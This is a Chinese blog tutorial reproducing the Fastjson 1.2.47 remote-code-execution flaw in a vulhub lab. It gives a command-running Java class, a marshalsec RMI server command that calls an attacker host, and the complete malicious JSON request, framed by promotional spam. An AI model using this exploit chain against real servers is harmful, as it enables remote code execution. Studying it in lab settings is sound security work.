22 - vulhub - Fastjson 1(1)

最新推荐文章于 2024-06-23 14:22:59 发布
最新推荐文章于 2024-06-23 14:22:59 发布
阅读量373 收藏 5
点赞数 5
分类专栏: 程序员 文章标签: python 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84140302/article/details/138884479
版权

现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。

分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

复现方法与 fastjson 反序列化导致任意命令执行漏洞 [fastjson 1.2.47-rce]相似,只是换了一个EXP。

EXP下载地址:https://github.com/CaijiOrz/fastjson-1.2.47-RCE

下载下来里面是三个文件。如下:

在这里插入图片描述

漏洞利用限制

FastJson < 1.2.48

环境准备

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.0.101 (虚拟机 Kali 2020.2 、Java1.8、Burp)

启动 fastjson 反序列化导致任意命令执行漏洞 环境

1.进入 vulhub 的 Fastjson 1.2.47 路径

cd /usr/local/tools/vulhub/fastjson/1.2.47-rce

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

在这里插入图片描述

访问 8090 端口

在这里插入图片描述

漏洞利用

同样的需要先使用 javac 编译一个 TouchFile.class 文件

// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {“touch”, “/tmp/success”};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

或者直接利用上文中的 EXP https://github.com/CaijiOrz/fastjson-1.2.47-RCE , 该Exploit.java只是一段反弹shell的代码,需要修改为攻击机的ip和端口。[吐个槽,我反弹shell失败了,TouchFile倒是成功了]如下图:

在这里插入图片描述

在这里插入图片描述

这里我们直接使用 EXP 好了。

在该 EXP 目录下利用python模拟启动一个本地可以访问的服务器。

python -m SimpleHTTPServer 22222

在这里插入图片描述

在这里插入图片描述

同样的在当前目录启动LDAP服务,修改IP为当前这台服务器的IP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.98.192.99:22222/#TouchFile" 9999

在这里插入图片描述

至此,我们整个攻击环境已经准备好。

验证漏洞利用是否成功

利用我们的攻击环境,向靶场发送payload。

构造好的请求包发送如下,注意Content-type格式要json,并且是post请求。

POST / HTTP/1.1

Host: 139.196.87.102:8090

Accept: /

Accept-Encoding: gzip, deflate

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 268

Content-Type: application/json

{

“a”:{

“@type”:“java.lang.Class”,

“val”:“com.sun.rowset.JdbcRowSetImpl”

},

“b”:{

“@type”:“com.sun.rowset.JdbcRowSetImpl”,

“dataSourceName”:“rmi://47.98.192.99:9999/EXploit”,

“autoCommit”:true

}

}

进入容器,查看 success 文件是否创建。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

说实话, 反弹shell真折腾人!

在这里插入图片描述

感谢每一个认真阅读我文章的人,看着粉丝一路的上涨和关注,礼尚往来总是要有的:

① 2000多本Python电子书(主流和经典的书籍应该都有了)

② Python标准库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)

⑤ Python学习路线图(告别不入流的学习)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84140302
关注
专栏目录
Fastjson 1.2.47 远程命令执行漏
玄道的网安博客
06-11 2332
1. 漏洞简介 Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响 (不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海) 2. 影响组件 Fastjson < 1.2.48 (<1.2.68?) 3. 漏洞指纹 可以通过DNS回显的方式检测后端是否使用Fastjson {"@type":"java.net.Inet4Address", "val":"dnsl
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1863
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。 漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。 过程: 1.Fastjson在开始解析json (JS 对象
22 - vulhub - Fastjson 1.2.47 远程命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 1139
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 因此在这里建议请及时更新至最新版本!
Fastjson 1.2.47 远程命令执行漏洞
m0_63241485的博客
08-17 1248
astjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。...
Fastjson-1.2.47远程命令执行漏洞(标明坑位)
晚安這個未知的世界
09-21 1218
前言 最近一直想复现这个漏洞,但是一直没时间,也没怎么在网上找到真的有用的文章,太多水文了,10篇文章有9篇都是一模一样的copy,还有一篇就只copy了一半,另一半就不搞了,真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的sett
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
m0_67621628的博客
03-22 2349
2.编译并启动环境 docker-compose up -d 3.查看环境运行状态 docker ps | grep rce 访问 8090 端口 []( )漏洞利用 首先 vulhub 给出的复现提示如下 因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制, 我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 首先编译并上传命令执行代码,如http://evil
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 804
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
vulhub漏洞复现十四_fastjson
weixin_44193247的博客
01-25 1305
vulhub漏洞复现练习篇
任务 : 使用Docker搭建Java漏洞的实验环境 https://vulhub.org Fastjson : 1.2.24 和 1.2.47 log4j2 : CVE-2021-44228 kali2020-2024
最新发布
09-19
RUN wget https://mvnrepository.com/artifact/com.alibaba/fastjson/1.2.24/download fastjson-1.2.24.jar && mv fastjson-1.2.24.jar /usr/local/lib/ # 安装Fastjson 1.2.47 RUN wget ...
vlhub_fastjson1.2.45
m0_54525483的博客
02-03 4730
vlhub_fastjson1.2.451、环境搭建1.1、下载安装docker1.2、将vulhub下载到本地2、复现过程 1、环境搭建 1.1、下载安装docker 参考:https://zhuanlan.zhihu.com/p/82361096 1.2、将vulhub下载到本地 下载压缩包 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip 解压压缩包 unzip vulhub-maste
Fastjson 1.2.47 远程命令执行漏洞(CNVD-2019-22238)
黑白的博客
11-23 2005
声明 好好学习,天天向上 漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可
vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现
一剑开天门!的博客
02-17 2118
vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 579
fastjson 1.2.47 远程命令执行漏洞
vulhub复现之fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2979
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
Fastjson1.2.47版本远程命令执行漏洞
来到了学渣的博客
07-20 3884
我的一个好朋友和我说,他在淘宝挖到fastjson命令执行,获得了一万奖金。我虽然是个学渣,也不太懂java,但起码以后碰到了,要知道这个玩意,并且要知道这个玩意如何挖掘。话不多说,开始复现之路。 环境 攻击机ip 192.168.10.144 漏洞环境ip 192.168.10.158 攻击的步骤: 1.Exploit.exp需要进行javac编译 2 所有用的工具和编译后的包要在同一目录,然后在该目录启动http服务和启动一个RMI服务器,监听9999端。其中RMI服务marshalsec
Fastjson 1.2.47 (远程代码执行)利用EXP进行漏洞复现
三天不打上房揭瓦的博客
12-26 2295
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录漏洞概述漏洞复现环境准备利用过程避免踩坑防御方法 漏洞概述 漏洞复现 环境准备 1、一台windows10虚拟机 ip:192.168.0.110 作用:反弹shell的攻击机。 2、一台kali20(任意版本)的虚拟机 ip:192.168.0.111 作用:搭建Web和RMI服务的机器。 3、一台Ubuntu,装好vulhub靶场的虚拟机 ip:192.168.0.115 作用:搭建漏
Fastjson命令执行漏洞复现(1.2.47和1.2.24)
xiaobai_20190815的博客
04-12 1232
一、漏洞描述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链 二、影响版本 fastjson <=1.2.48(autoType为关闭状态也可使用) 三、漏洞利用 1、docker 拉取镜像,靶机一键起环境 docker-compose up -d 2、本机编辑恶意java文件,用于反弹shell,监听端口为1234,并编译javac Exploit.j
fastjson1.2.47远程代码执行&JNDI漏洞利用工具
归零者的博客
06-23 934
Fastjson是一种Java库,用于处理JSON数据。它提供了一种简单高效的方式,用于将Java对象序列化为JSON,以及将JSON反序列化为Java对象。Fastjson以其高速和低内存消耗而闻名,因此在Java应用中广泛应用于JSON的序列化和反序列化。它支持各种功能,如JSON解析、序列化、反序列化以及对JSON数据的操作。Fastjson被广泛应用于Web应用、移动应用和其他基于Java的系统中,用于处理JSON数据。
张小白的实验室Fastjson1.2.47反序列化漏洞复现
Litbai_zhang
07-10 810
实验环境 攻击机C:Windows 10 企业版 LTSC 靶机A:CentOS8 (公网) 监听主机B:Centos7(公网) 项目地址: https://github.com/vulhub/vulhub 该篇复现环境是fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装docker curl https://download.docker.com/linux/centos/docker...
rocketmq-client4.4.0 依赖fastjson版本
09-28
RocketMQ-Client 4.4.0 依赖的 fastjson 版本是 1.2.62。RocketMQ 是一款开源的消息中间件,用于在分布式系统中实现高效、可靠和可扩展的消息传递。RocketMQ-Client 4.4.0 是 RocketMQ 的 Java 客户端,用于与 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值